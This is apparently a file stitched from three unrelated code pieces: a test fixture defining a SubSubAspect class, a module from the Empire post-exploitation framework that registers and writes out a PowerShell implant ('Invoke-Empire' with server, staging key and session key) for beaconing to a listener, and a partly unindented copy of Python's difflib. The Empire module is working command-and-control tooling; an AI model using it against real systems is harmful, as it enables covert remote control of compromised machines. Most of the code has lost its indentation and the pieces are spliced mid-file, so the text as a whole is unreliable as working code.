def SubSubAspect(SubAspect, SubSubAspect_docs, SubAspect_tastes):
    """An exclusive SubSubAspect class for unit tests."""
    @SubAspect.subaspect
    class SubSubAspect:
        """
        Definition
        """
        # BUG FIX: the original assigned `SubAspect_docs`, which is not a
        # parameter of this fixture and would raise NameError at collection;
        # the injected `SubSubAspect_docs` fixture is clearly what was meant.
        docs = SubSubAspect_docs
        # NOTE(review): tastes come from SubAspect_tastes (as originally
        # requested); confirm whether SubSubAspect_tastes was intended.
        salty = SubAspect_tastes['salty']
        sweet = SubAspect_tastes['sweet']
        sour = SubAspect_tastes['sour']

    return SubSubAspect
import os
import string
from pydispatch import dispatcher
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Generate Agent',
'Author': ['@harmj0y'],
'Description': ("Generates an agent code instance for a specified listener, "
"pre-staged, and register the agent in the database. This allows "
"the agent to begin beconing behavior immediately."),
'Comments': []
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Listener' : {
'Description' : 'Listener to generate the agent for.',
'Required' : True,
'Value' : ''
},
'Language' : {
'Description' : 'Language to generate for the agent.',
'Required' : True,
'Value' : ''
},
'OutFile' : {
'Description' : 'Output file to write the agent code to.',
'Required' : True,
'Value' : '/tmp/agent'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def execute(self):
listenerName = self.options['Listener']['Value']
language = self.options['Language']['Value']
outFile = self.options['OutFile']['Value']
if listenerName not in self.mainMenu.listeners.activeListeners:
print helpers.color("[!] Error: %s not an active listener")
return None
activeListener = self.mainMenu.listeners.activeListeners[listenerName]
chars = string.uppercase + string.digits
sessionID = helpers.random_string(length=8, charset=chars)
stagingKey = activeListener['options']['StagingKey']['Value']
delay = activeListener['options']['DefaultDelay']['Value']
jitter = activeListener['options']['DefaultJitter']['Value']
profile = activeListener['options']['DefaultProfile']['Value']
killDate = activeListener['options']['KillDate']['Value']
workingHours = activeListener['options']['WorkingHours']['Value']
lostLimit = activeListener['options']['DefaultLostLimit']['Value']
if 'Host' in activeListener['options']:
host = activeListener['options']['Host']['Value']
else:
host = ''
# add the agent
self.mainMenu.agents.add_agent(sessionID, '0.0.0.0', delay, jitter, profile, killDate, workingHours, lostLimit, listener=listenerName, language=language)
# get the agent's session key
sessionKey = self.mainMenu.agents.get_agent_session_key_db(sessionID)
agentCode = self.mainMenu.listeners.loadedListeners[activeListener['moduleName']].generate_agent(activeListener['options'], language=language)
if language.lower() == 'powershell':
agentCode += "\nInvoke-Empire -Servers @('%s') -StagingKey '%s' -SessionKey '%s' -SessionID '%s';" % (host, stagingKey, sessionKey, sessionID)
else:
print helpers.color('[!] Only PowerShell agent generation is supported at this time.')
return ''
# TODO: python agent generation - need to patch in crypto functions from the stager...
print helpers.color("[+] Pre-generated agent '%s' now registered." % (sessionID))
# increment the supplied file name appropriately if it already exists
i = 1
outFileOrig = outFile
while os.path.exists(outFile):
parts = outFileOrig.split('.')
if len(parts) == 1:
base = outFileOrig
ext = None
else:
base = '.'.join(parts[0:-1])
ext = parts[-1]
if ext:
outFile = "%s%s.%s" % (base, i, ext)
else:
outFile = "%s%s" % (base, i)
i += 1
f = open(outFile, 'w')
f.write(agentCode)
f.close()
print helpers.color("[*] %s agent code for listener %s with sessionID '%s' written out to %s" % (language, listenerName, sessionID, outFile))
print helpers.color("[*] Run sysinfo command after agent starts checking in!") | unknown | codeparrot/codeparrot-clean | ||
#! /usr/bin/env python3
"""
Module difflib -- helpers for computing deltas between objects.
Function get_close_matches(word, possibilities, n=3, cutoff=0.6):
Use SequenceMatcher to return list of the best "good enough" matches.
Function context_diff(a, b):
For two lists of strings, return a delta in context diff format.
Function ndiff(a, b):
Return a delta: the difference between `a` and `b` (lists of strings).
Function restore(delta, which):
Return one of the two sequences that generated an ndiff delta.
Function unified_diff(a, b):
For two lists of strings, return a delta in unified diff format.
Class SequenceMatcher:
A flexible class for comparing pairs of sequences of any type.
Class Differ:
For producing human-readable deltas from sequences of lines of text.
Class HtmlDiff:
For producing HTML side by side comparison with change highlights.
"""
__all__ = ['get_close_matches', 'ndiff', 'restore', 'SequenceMatcher',
'Differ','IS_CHARACTER_JUNK', 'IS_LINE_JUNK', 'context_diff',
'unified_diff', 'HtmlDiff', 'Match']
import warnings
import heapq
from collections import namedtuple as _namedtuple
Match = _namedtuple('Match', 'a b size')
def _calculate_ratio(matches, length):
if length:
return 2.0 * matches / length
return 1.0
class SequenceMatcher:
"""
SequenceMatcher is a flexible class for comparing pairs of sequences of
any type, so long as the sequence elements are hashable. The basic
algorithm predates, and is a little fancier than, an algorithm
published in the late 1980's by Ratcliff and Obershelp under the
hyperbolic name "gestalt pattern matching". The basic idea is to find
the longest contiguous matching subsequence that contains no "junk"
elements (R-O doesn't address junk). The same idea is then applied
recursively to the pieces of the sequences to the left and to the right
of the matching subsequence. This does not yield minimal edit
sequences, but does tend to yield matches that "look right" to people.
SequenceMatcher tries to compute a "human-friendly diff" between two
sequences. Unlike e.g. UNIX(tm) diff, the fundamental notion is the
longest *contiguous* & junk-free matching subsequence. That's what
catches peoples' eyes. The Windows(tm) windiff has another interesting
notion, pairing up elements that appear uniquely in each sequence.
That, and the method here, appear to yield more intuitive difference
reports than does diff. This method appears to be the least vulnerable
to synching up on blocks of "junk lines", though (like blank lines in
ordinary text files, or maybe "<P>" lines in HTML files). That may be
because this is the only method of the 3 that has a *concept* of
"junk" <wink>.
Example, comparing two strings, and considering blanks to be "junk":
>>> s = SequenceMatcher(lambda x: x == " ",
... "private Thread currentThread;",
... "private volatile Thread currentThread;")
>>>
.ratio() returns a float in [0, 1], measuring the "similarity" of the
sequences. As a rule of thumb, a .ratio() value over 0.6 means the
sequences are close matches:
>>> print(round(s.ratio(), 3))
0.866
>>>
If you're only interested in where the sequences match,
.get_matching_blocks() is handy:
>>> for block in s.get_matching_blocks():
... print("a[%d] and b[%d] match for %d elements" % block)
a[0] and b[0] match for 8 elements
a[8] and b[17] match for 21 elements
a[29] and b[38] match for 0 elements
Note that the last tuple returned by .get_matching_blocks() is always a
dummy, (len(a), len(b), 0), and this is the only case in which the last
tuple element (number of elements matched) is 0.
If you want to know how to change the first sequence into the second,
use .get_opcodes():
>>> for opcode in s.get_opcodes():
... print("%6s a[%d:%d] b[%d:%d]" % opcode)
equal a[0:8] b[0:8]
insert a[8:8] b[8:17]
equal a[8:29] b[17:38]
See the Differ class for a fancy human-friendly file differencer, which
uses SequenceMatcher both to compare sequences of lines, and to compare
sequences of characters within similar (near-matching) lines.
See also function get_close_matches() in this module, which shows how
simple code building on SequenceMatcher can be used to do useful work.
Timing: Basic R-O is cubic time worst case and quadratic time expected
case. SequenceMatcher is quadratic time for the worst case and has
expected-case behavior dependent in a complicated way on how many
elements the sequences have in common; best case time is linear.
Methods:
__init__(isjunk=None, a='', b='')
Construct a SequenceMatcher.
set_seqs(a, b)
Set the two sequences to be compared.
set_seq1(a)
Set the first sequence to be compared.
set_seq2(b)
Set the second sequence to be compared.
find_longest_match(alo, ahi, blo, bhi)
Find longest matching block in a[alo:ahi] and b[blo:bhi].
get_matching_blocks()
Return list of triples describing matching subsequences.
get_opcodes()
Return list of 5-tuples describing how to turn a into b.
ratio()
Return a measure of the sequences' similarity (float in [0,1]).
quick_ratio()
Return an upper bound on .ratio() relatively quickly.
real_quick_ratio()
Return an upper bound on ratio() very quickly.
"""
def __init__(self, isjunk=None, a='', b='', autojunk=True):
"""Construct a SequenceMatcher.
Optional arg isjunk is None (the default), or a one-argument
function that takes a sequence element and returns true iff the
element is junk. None is equivalent to passing "lambda x: 0", i.e.
no elements are considered to be junk. For example, pass
lambda x: x in " \\t"
if you're comparing lines as sequences of characters, and don't
want to synch up on blanks or hard tabs.
Optional arg a is the first of two sequences to be compared. By
default, an empty string. The elements of a must be hashable. See
also .set_seqs() and .set_seq1().
Optional arg b is the second of two sequences to be compared. By
default, an empty string. The elements of b must be hashable. See
also .set_seqs() and .set_seq2().
Optional arg autojunk should be set to False to disable the
"automatic junk heuristic" that treats popular elements as junk
(see module documentation for more information).
"""
# Members:
# a
# first sequence
# b
# second sequence; differences are computed as "what do
# we need to do to 'a' to change it into 'b'?"
# b2j
# for x in b, b2j[x] is a list of the indices (into b)
# at which x appears; junk and popular elements do not appear
# fullbcount
# for x in b, fullbcount[x] == the number of times x
# appears in b; only materialized if really needed (used
# only for computing quick_ratio())
# matching_blocks
# a list of (i, j, k) triples, where a[i:i+k] == b[j:j+k];
# ascending & non-overlapping in i and in j; terminated by
# a dummy (len(a), len(b), 0) sentinel
# opcodes
# a list of (tag, i1, i2, j1, j2) tuples, where tag is
# one of
# 'replace' a[i1:i2] should be replaced by b[j1:j2]
# 'delete' a[i1:i2] should be deleted
# 'insert' b[j1:j2] should be inserted
# 'equal' a[i1:i2] == b[j1:j2]
# isjunk
# a user-supplied function taking a sequence element and
# returning true iff the element is "junk" -- this has
# subtle but helpful effects on the algorithm, which I'll
# get around to writing up someday <0.9 wink>.
# DON'T USE! Only __chain_b uses this. Use isbjunk.
# bjunk
# the items in b for which isjunk is True.
# bpopular
# nonjunk items in b treated as junk by the heuristic (if used).
self.isjunk = isjunk
self.a = self.b = None
self.autojunk = autojunk
self.set_seqs(a, b)
def set_seqs(self, a, b):
"""Set the two sequences to be compared.
>>> s = SequenceMatcher()
>>> s.set_seqs("abcd", "bcde")
>>> s.ratio()
0.75
"""
self.set_seq1(a)
self.set_seq2(b)
def set_seq1(self, a):
"""Set the first sequence to be compared.
The second sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq1("bcde")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq2().
"""
if a is self.a:
return
self.a = a
self.matching_blocks = self.opcodes = None
def set_seq2(self, b):
"""Set the second sequence to be compared.
The first sequence to be compared is not changed.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.set_seq2("abcd")
>>> s.ratio()
1.0
>>>
SequenceMatcher computes and caches detailed information about the
second sequence, so if you want to compare one sequence S against
many sequences, use .set_seq2(S) once and call .set_seq1(x)
repeatedly for each of the other sequences.
See also set_seqs() and set_seq1().
"""
if b is self.b:
return
self.b = b
self.matching_blocks = self.opcodes = None
self.fullbcount = None
self.__chain_b()
# For each element x in b, set b2j[x] to a list of the indices in
# b where x appears; the indices are in increasing order; note that
# the number of times x appears in b is len(b2j[x]) ...
# when self.isjunk is defined, junk elements don't show up in this
# map at all, which stops the central find_longest_match method
# from starting any matching block at a junk element ...
# also creates the fast isbjunk function ...
# b2j also does not contain entries for "popular" elements, meaning
# elements that account for more than 1 + 1% of the total elements, and
# when the sequence is reasonably large (>= 200 elements); this can
# be viewed as an adaptive notion of semi-junk, and yields an enormous
# speedup when, e.g., comparing program files with hundreds of
# instances of "return NULL;" ...
# note that this is only called when b changes; so for cross-product
# kinds of matches, it's best to call set_seq2 once, then set_seq1
# repeatedly
def __chain_b(self):
# Because isjunk is a user-defined (not C) function, and we test
# for junk a LOT, it's important to minimize the number of calls.
# Before the tricks described here, __chain_b was by far the most
# time-consuming routine in the whole module! If anyone sees
# Jim Roskind, thank him again for profile.py -- I never would
# have guessed that.
# The first trick is to build b2j ignoring the possibility
# of junk. I.e., we don't call isjunk at all yet. Throwing
# out the junk later is much cheaper than building b2j "right"
# from the start.
b = self.b
self.b2j = b2j = {}
for i, elt in enumerate(b):
indices = b2j.setdefault(elt, [])
indices.append(i)
# Purge junk elements
self.bjunk = junk = set()
isjunk = self.isjunk
if isjunk:
for elt in b2j.keys():
if isjunk(elt):
junk.add(elt)
for elt in junk: # separate loop avoids separate list of keys
del b2j[elt]
# Purge popular elements that are not junk
self.bpopular = popular = set()
n = len(b)
if self.autojunk and n >= 200:
ntest = n // 100 + 1
for elt, idxs in b2j.items():
if len(idxs) > ntest:
popular.add(elt)
for elt in popular: # ditto; as fast for 1% deletion
del b2j[elt]
def isbjunk(self, item):
"Deprecated; use 'item in SequenceMatcher().bjunk'."
warnings.warn("'SequenceMatcher().isbjunk(item)' is deprecated;\n"
"use 'item in SMinstance.bjunk' instead.",
DeprecationWarning, 2)
return item in self.bjunk
def isbpopular(self, item):
"Deprecated; use 'item in SequenceMatcher().bpopular'."
warnings.warn("'SequenceMatcher().isbpopular(item)' is deprecated;\n"
"use 'item in SMinstance.bpopular' instead.",
DeprecationWarning, 2)
return item in self.bpopular
    def find_longest_match(self, alo, ahi, blo, bhi):
        """Find longest matching block in a[alo:ahi] and b[blo:bhi].

        If isjunk is not defined:

        Return (i,j,k) such that a[i:i+k] is equal to b[j:j+k], where
            alo <= i <= i+k <= ahi
            blo <= j <= j+k <= bhi
        and for all (i',j',k') meeting those conditions,
            k >= k'
            i <= i'
            and if i == i', j <= j'

        In other words, of all maximal matching blocks, return one that
        starts earliest in a, and of all those maximal matching blocks that
        start earliest in a, return the one that starts earliest in b.

        >>> s = SequenceMatcher(None, " abcd", "abcd abcd")
        >>> s.find_longest_match(0, 5, 0, 9)
        Match(a=0, b=4, size=5)

        If isjunk is defined, first the longest matching block is
        determined as above, but with the additional restriction that no
        junk element appears in the block.  Then that block is extended as
        far as possible by matching (only) junk elements on both sides.  So
        the resulting block never matches on junk except as identical junk
        happens to be adjacent to an "interesting" match.

        Here's the same example as before, but considering blanks to be
        junk.  That prevents " abcd" from matching the " abcd" at the tail
        end of the second sequence directly.  Instead only the "abcd" can
        match, and matches the leftmost "abcd" in the second sequence:

        >>> s = SequenceMatcher(lambda x: x==" ", " abcd", "abcd abcd")
        >>> s.find_longest_match(0, 5, 0, 9)
        Match(a=1, b=0, size=4)

        If no blocks match, return (alo, blo, 0).

        >>> s = SequenceMatcher(None, "ab", "c")
        >>> s.find_longest_match(0, 2, 0, 1)
        Match(a=0, b=0, size=0)
        """
        # CAUTION: stripping common prefix or suffix would be incorrect.
        # E.g.,
        #    ab
        #    acab
        # Longest matching block is "ab", but if common prefix is
        # stripped, it's "a" (tied with "b").  UNIX(tm) diff does so
        # strip, so ends up claiming that ab is changed to acab by
        # inserting "ca" in the middle.  That's minimal but unintuitive:
        # "it's obvious" that someone inserted "ac" at the front.
        # Windiff ends up at the same place as diff, but by pairing up
        # the unique 'b's and then matching the first two 'a's.
        a, b, b2j, isbjunk = self.a, self.b, self.b2j, self.bjunk.__contains__
        besti, bestj, bestsize = alo, blo, 0
        # Dynamic-programming sweep for the longest junk-free match.
        # During an iteration of the loop, j2len[j] = length of longest
        # junk-free match ending with a[i-1] and b[j].
        j2len = {}
        nothing = []
        for i in range(alo, ahi):
            # look at all instances of a[i] in b; note that because
            # b2j has no junk keys, the loop is skipped if a[i] is junk
            j2lenget = j2len.get
            newj2len = {}
            for j in b2j.get(a[i], nothing):
                # a[i] matches b[j]
                if j < blo:
                    continue
                if j >= bhi:
                    break
                # Extend the match that ended at (i-1, j-1), if any.
                k = newj2len[j] = j2lenget(j-1, 0) + 1
                if k > bestsize:
                    besti, bestj, bestsize = i-k+1, j-k+1, k
            # Roll the DP table forward: next row only needs this row.
            j2len = newj2len
        # Extend the best by non-junk elements on each end.  In particular,
        # "popular" non-junk elements aren't in b2j, which greatly speeds
        # the inner loop above, but also means "the best" match so far
        # doesn't contain any junk *or* popular non-junk elements.
        while besti > alo and bestj > blo and \
              not isbjunk(b[bestj-1]) and \
              a[besti-1] == b[bestj-1]:
            besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
        while besti+bestsize < ahi and bestj+bestsize < bhi and \
              not isbjunk(b[bestj+bestsize]) and \
              a[besti+bestsize] == b[bestj+bestsize]:
            bestsize += 1
        # Now that we have a wholly interesting match (albeit possibly
        # empty!), we may as well suck up the matching junk on each
        # side of it too.  Can't think of a good reason not to, and it
        # saves post-processing the (possibly considerable) expense of
        # figuring out what to do with it.  In the case of an empty
        # interesting match, this is clearly the right thing to do,
        # because no other kind of match is possible in the regions.
        while besti > alo and bestj > blo and \
              isbjunk(b[bestj-1]) and \
              a[besti-1] == b[bestj-1]:
            besti, bestj, bestsize = besti-1, bestj-1, bestsize+1
        while besti+bestsize < ahi and bestj+bestsize < bhi and \
              isbjunk(b[bestj+bestsize]) and \
              a[besti+bestsize] == b[bestj+bestsize]:
            bestsize = bestsize + 1
        return Match(besti, bestj, bestsize)
def get_matching_blocks(self):
"""Return list of triples describing matching subsequences.
Each triple is of the form (i, j, n), and means that
a[i:i+n] == b[j:j+n]. The triples are monotonically increasing in
i and in j. New in Python 2.5, it's also guaranteed that if
(i, j, n) and (i', j', n') are adjacent triples in the list, and
the second is not the last triple in the list, then i+n != i' or
j+n != j'. IOW, adjacent triples never describe adjacent equal
blocks.
The last triple is a dummy, (len(a), len(b), 0), and is the only
triple with n==0.
>>> s = SequenceMatcher(None, "abxcd", "abcd")
>>> list(s.get_matching_blocks())
[Match(a=0, b=0, size=2), Match(a=3, b=2, size=2), Match(a=5, b=4, size=0)]
"""
if self.matching_blocks is not None:
return self.matching_blocks
la, lb = len(self.a), len(self.b)
# This is most naturally expressed as a recursive algorithm, but
# at least one user bumped into extreme use cases that exceeded
# the recursion limit on their box. So, now we maintain a list
# ('queue`) of blocks we still need to look at, and append partial
# results to `matching_blocks` in a loop; the matches are sorted
# at the end.
queue = [(0, la, 0, lb)]
matching_blocks = []
while queue:
alo, ahi, blo, bhi = queue.pop()
i, j, k = x = self.find_longest_match(alo, ahi, blo, bhi)
# a[alo:i] vs b[blo:j] unknown
# a[i:i+k] same as b[j:j+k]
# a[i+k:ahi] vs b[j+k:bhi] unknown
if k: # if k is 0, there was no matching block
matching_blocks.append(x)
if alo < i and blo < j:
queue.append((alo, i, blo, j))
if i+k < ahi and j+k < bhi:
queue.append((i+k, ahi, j+k, bhi))
matching_blocks.sort()
# It's possible that we have adjacent equal blocks in the
# matching_blocks list now. Starting with 2.5, this code was added
# to collapse them.
i1 = j1 = k1 = 0
non_adjacent = []
for i2, j2, k2 in matching_blocks:
# Is this block adjacent to i1, j1, k1?
if i1 + k1 == i2 and j1 + k1 == j2:
# Yes, so collapse them -- this just increases the length of
# the first block by the length of the second, and the first
# block so lengthened remains the block to compare against.
k1 += k2
else:
# Not adjacent. Remember the first block (k1==0 means it's
# the dummy we started with), and make the second block the
# new block to compare against.
if k1:
non_adjacent.append((i1, j1, k1))
i1, j1, k1 = i2, j2, k2
if k1:
non_adjacent.append((i1, j1, k1))
non_adjacent.append( (la, lb, 0) )
self.matching_blocks = non_adjacent
return map(Match._make, self.matching_blocks)
def get_opcodes(self):
"""Return list of 5-tuples describing how to turn a into b.
Each tuple is of the form (tag, i1, i2, j1, j2). The first tuple
has i1 == j1 == 0, and remaining tuples have i1 == the i2 from the
tuple preceding it, and likewise for j1 == the previous j2.
The tags are strings, with these meanings:
'replace': a[i1:i2] should be replaced by b[j1:j2]
'delete': a[i1:i2] should be deleted.
Note that j1==j2 in this case.
'insert': b[j1:j2] should be inserted at a[i1:i1].
Note that i1==i2 in this case.
'equal': a[i1:i2] == b[j1:j2]
>>> a = "qabxcd"
>>> b = "abycdf"
>>> s = SequenceMatcher(None, a, b)
>>> for tag, i1, i2, j1, j2 in s.get_opcodes():
... print(("%7s a[%d:%d] (%s) b[%d:%d] (%s)" %
... (tag, i1, i2, a[i1:i2], j1, j2, b[j1:j2])))
delete a[0:1] (q) b[0:0] ()
equal a[1:3] (ab) b[0:2] (ab)
replace a[3:4] (x) b[2:3] (y)
equal a[4:6] (cd) b[3:5] (cd)
insert a[6:6] () b[5:6] (f)
"""
if self.opcodes is not None:
return self.opcodes
i = j = 0
self.opcodes = answer = []
for ai, bj, size in self.get_matching_blocks():
# invariant: we've pumped out correct diffs to change
# a[:i] into b[:j], and the next matching block is
# a[ai:ai+size] == b[bj:bj+size]. So we need to pump
# out a diff to change a[i:ai] into b[j:bj], pump out
# the matching block, and move (i,j) beyond the match
tag = ''
if i < ai and j < bj:
tag = 'replace'
elif i < ai:
tag = 'delete'
elif j < bj:
tag = 'insert'
if tag:
answer.append( (tag, i, ai, j, bj) )
i, j = ai+size, bj+size
# the list of matching blocks is terminated by a
# sentinel with size 0
if size:
answer.append( ('equal', ai, i, bj, j) )
return answer
    def get_grouped_opcodes(self, n=3):
        """ Isolate change clusters by eliminating ranges with no changes.

        Return a generator of groups with upto n lines of context.
        Each group is in the same format as returned by get_opcodes().

        >>> from pprint import pprint
        >>> a = list(map(str, range(1,40)))
        >>> b = a[:]
        >>> b[8:8] = ['i']     # Make an insertion
        >>> b[20] += 'x'       # Make a replacement
        >>> b[23:28] = []      # Make a deletion
        >>> b[30] += 'y'       # Make another replacement
        >>> pprint(list(SequenceMatcher(None,a,b).get_grouped_opcodes()))
        [[('equal', 5, 8, 5, 8), ('insert', 8, 8, 8, 9), ('equal', 8, 11, 9, 12)],
         [('equal', 16, 19, 17, 20),
          ('replace', 19, 20, 20, 21),
          ('equal', 20, 22, 21, 23),
          ('delete', 22, 27, 23, 23),
          ('equal', 27, 30, 23, 26)],
         [('equal', 31, 34, 27, 30),
          ('replace', 34, 35, 30, 31),
          ('equal', 35, 38, 31, 34)]]
        """
        codes = self.get_opcodes()
        if not codes:
            codes = [("equal", 0, 1, 0, 1)]
        # Fixup leading and trailing groups if they show no changes:
        # clamp an initial/final 'equal' run to at most n context lines.
        # NOTE(review): `codes` is the list cached in self.opcodes, so these
        # two assignments mutate the cache in place -- confirm callers never
        # rely on the unclamped opcodes after calling this generator.
        if codes[0][0] == 'equal':
            tag, i1, i2, j1, j2 = codes[0]
            codes[0] = tag, max(i1, i2-n), i2, max(j1, j2-n), j2
        if codes[-1][0] == 'equal':
            tag, i1, i2, j1, j2 = codes[-1]
            codes[-1] = tag, i1, min(i2, i1+n), j1, min(j2, j1+n)
        nn = n + n
        group = []
        for tag, i1, i2, j1, j2 in codes:
            # End the current group and start a new one whenever
            # there is a large range with no changes (an 'equal' run
            # longer than 2*n lines cannot all be context).
            if tag == 'equal' and i2-i1 > nn:
                # Close the group with n trailing context lines ...
                group.append((tag, i1, min(i2, i1+n), j1, min(j2, j1+n)))
                yield group
                group = []
                # ... and open the next group with n leading context lines.
                i1, j1 = max(i1, i2-n), max(j1, j2-n)
            group.append((tag, i1, i2, j1 ,j2))
        # A final group consisting solely of context is not a change cluster.
        if group and not (len(group)==1 and group[0][0] == 'equal'):
            yield group
def ratio(self):
"""Return a measure of the sequences' similarity (float in [0,1]).
Where T is the total number of elements in both sequences, and
M is the number of matches, this is 2.0*M / T.
Note that this is 1 if the sequences are identical, and 0 if
they have nothing in common.
.ratio() is expensive to compute if you haven't already computed
.get_matching_blocks() or .get_opcodes(), in which case you may
want to try .quick_ratio() or .real_quick_ratio() first to get an
upper bound.
>>> s = SequenceMatcher(None, "abcd", "bcde")
>>> s.ratio()
0.75
>>> s.quick_ratio()
0.75
>>> s.real_quick_ratio()
1.0
"""
matches = sum(triple[-1] for triple in self.get_matching_blocks())
return _calculate_ratio(matches, len(self.a) + len(self.b))
def quick_ratio(self):
"""Return an upper bound on ratio() relatively quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute.
"""
# viewing a and b as multisets, set matches to the cardinality
# of their intersection; this counts the number of matches
# without regard to order, so is clearly an upper bound
if self.fullbcount is None:
self.fullbcount = fullbcount = {}
for elt in self.b:
fullbcount[elt] = fullbcount.get(elt, 0) + 1
fullbcount = self.fullbcount
# avail[x] is the number of times x appears in 'b' less the
# number of times we've seen it in 'a' so far ... kinda
avail = {}
availhas, matches = avail.__contains__, 0
for elt in self.a:
if availhas(elt):
numb = avail[elt]
else:
numb = fullbcount.get(elt, 0)
avail[elt] = numb - 1
if numb > 0:
matches = matches + 1
return _calculate_ratio(matches, len(self.a) + len(self.b))
def real_quick_ratio(self):
"""Return an upper bound on ratio() very quickly.
This isn't defined beyond that it is an upper bound on .ratio(), and
is faster to compute than either .ratio() or .quick_ratio().
"""
la, lb = len(self.a), len(self.b)
# can't have more matches than the number of elements in the
# shorter sequence
return _calculate_ratio(min(la, lb), la + lb)
def get_close_matches(word, possibilities, n=3, cutoff=0.6):
    """Use SequenceMatcher to return list of the best "good enough" matches.

    word is a sequence for which close matches are desired (typically a
    string).

    possibilities is a list of sequences against which to match word
    (typically a list of strings).

    Optional arg n (default 3) is the maximum number of close matches to
    return.  n must be > 0.

    Optional arg cutoff (default 0.6) is a float in [0, 1].  Possibilities
    that don't score at least that similar to word are ignored.

    The best (no more than n) matches among the possibilities are returned
    in a list, sorted by similarity score, most similar first.

    >>> get_close_matches("appel", ["ape", "apple", "peach", "puppy"])
    ['apple', 'ape']
    >>> import keyword as _keyword
    >>> get_close_matches("wheel", _keyword.kwlist)
    ['while']
    >>> get_close_matches("Apple", _keyword.kwlist)
    []
    >>> get_close_matches("accept", _keyword.kwlist)
    ['except']
    """
    if not n > 0:
        raise ValueError("n must be > 0: %r" % (n,))
    if not 0.0 <= cutoff <= 1.0:
        raise ValueError("cutoff must be in [0.0, 1.0]: %r" % (cutoff,))
    matcher = SequenceMatcher()
    # seq2 is set once: SequenceMatcher caches its analysis of seq2, so
    # only seq1 changes inside the loop.
    matcher.set_seq2(word)
    scored = []
    for candidate in possibilities:
        matcher.set_seq1(candidate)
        # Cheap upper bounds first; .ratio() runs only when both pass.
        if (matcher.real_quick_ratio() >= cutoff
                and matcher.quick_ratio() >= cutoff
                and matcher.ratio() >= cutoff):
            scored.append((matcher.ratio(), candidate))
    # Keep only the n highest-scoring candidates, best first, then
    # strip the scores.
    best = heapq.nlargest(n, scored)
    return [candidate for score, candidate in best]
def _count_leading(line, ch):
"""
Return number of `ch` characters at the start of `line`.
Example:
>>> _count_leading(' abc', ' ')
3
"""
i, n = 0, len(line)
while i < n and line[i] == ch:
i += 1
return i
class Differ:
    r"""
    Differ is a class for comparing sequences of lines of text, and
    producing human-readable differences or deltas.  Differ uses
    SequenceMatcher both to compare sequences of lines, and to compare
    sequences of characters within similar (near-matching) lines.

    Each line of a Differ delta begins with a two-letter code:

        '- '    line unique to sequence 1
        '+ '    line unique to sequence 2
        '  '    line common to both sequences
        '? '    line not present in either input sequence

    Lines beginning with '? ' attempt to guide the eye to intraline
    differences, and were not present in either input sequence.  These lines
    can be confusing if the sequences contain tab characters.

    Note that Differ makes no claim to produce a *minimal* diff.  To the
    contrary, minimal diffs are often counter-intuitive, because they synch
    up anywhere possible, sometimes accidental matches 100 pages apart.
    Restricting synch points to contiguous matches preserves some notion of
    locality, at the occasional cost of producing a longer diff.

    Example: Comparing two texts.

    First we set up the texts, sequences of individual single-line strings
    ending with newlines (such sequences can also be obtained from the
    `readlines()` method of file-like objects):

    >>> text1 = '''  1. Beautiful is better than ugly.
    ...   2. Explicit is better than implicit.
    ...   3. Simple is better than complex.
    ...   4. Complex is better than complicated.
    ... '''.splitlines(1)
    >>> len(text1)
    4
    >>> text1[0][-1]
    '\n'
    >>> text2 = '''  1. Beautiful is better than ugly.
    ...   3.   Simple is better than complex.
    ...   4. Complicated is better than complex.
    ...   5. Flat is better than nested.
    ... '''.splitlines(1)

    Next we instantiate a Differ object:

    >>> d = Differ()

    Note that when instantiating a Differ object we may pass functions to
    filter out line and character 'junk'.  See Differ.__init__ for details.

    Finally, we compare the two:

    >>> result = list(d.compare(text1, text2))

    'result' is a list of strings, so let's pretty-print it:

    >>> from pprint import pprint as _pprint
    >>> _pprint(result)
    ['    1. Beautiful is better than ugly.\n',
     '-   2. Explicit is better than implicit.\n',
     '-   3. Simple is better than complex.\n',
     '+   3.   Simple is better than complex.\n',
     '?     ++\n',
     '-   4. Complex is better than complicated.\n',
     '?            ^                     ---- ^\n',
     '+   4. Complicated is better than complex.\n',
     '?           ++++ ^                      ^\n',
     '+   5. Flat is better than nested.\n']

    As a single multi-line string it looks like this:

    >>> print(''.join(result), end="")
        1. Beautiful is better than ugly.
    -   2. Explicit is better than implicit.
    -   3. Simple is better than complex.
    +   3.   Simple is better than complex.
    ?     ++
    -   4. Complex is better than complicated.
    ?            ^                     ---- ^
    +   4. Complicated is better than complex.
    ?           ++++ ^                      ^
    +   5. Flat is better than nested.

    Methods:

    __init__(linejunk=None, charjunk=None)
        Construct a text differencer, with optional filters.

    compare(a, b)
        Compare two sequences of lines; generate the resulting delta.
    """

    def __init__(self, linejunk=None, charjunk=None):
        """
        Construct a text differencer, with optional filters.

        The two optional keyword parameters are for filter functions:

        - `linejunk`: A function that should accept a single string argument,
          and return true iff the string is junk. The module-level function
          `IS_LINE_JUNK` may be used to filter out lines without visible
          characters, except for at most one splat ('#').  It is recommended
          to leave linejunk None; as of Python 2.3, the underlying
          SequenceMatcher class has grown an adaptive notion of "noise" lines
          that's better than any static definition the author has ever been
          able to craft.

        - `charjunk`: A function that should accept a string of length 1. The
          module-level function `IS_CHARACTER_JUNK` may be used to filter out
          whitespace characters (a blank or tab; **note**: bad idea to include
          newline in this!).  Use of IS_CHARACTER_JUNK is recommended.
        """
        self.linejunk = linejunk
        self.charjunk = charjunk

    def compare(self, a, b):
        r"""
        Compare two sequences of lines; generate the resulting delta.

        Each sequence must contain individual single-line strings ending with
        newlines. Such sequences can be obtained from the `readlines()` method
        of file-like objects.  The delta generated also consists of newline-
        terminated strings, ready to be printed as-is via the writeline()
        method of a file-like object.

        Example:

        >>> print(''.join(Differ().compare('one\ntwo\nthree\n'.splitlines(1),
        ...                                'ore\ntree\nemu\n'.splitlines(1))),
        ...       end="")
        - one
        ?  ^
        + ore
        ?  ^
        - two
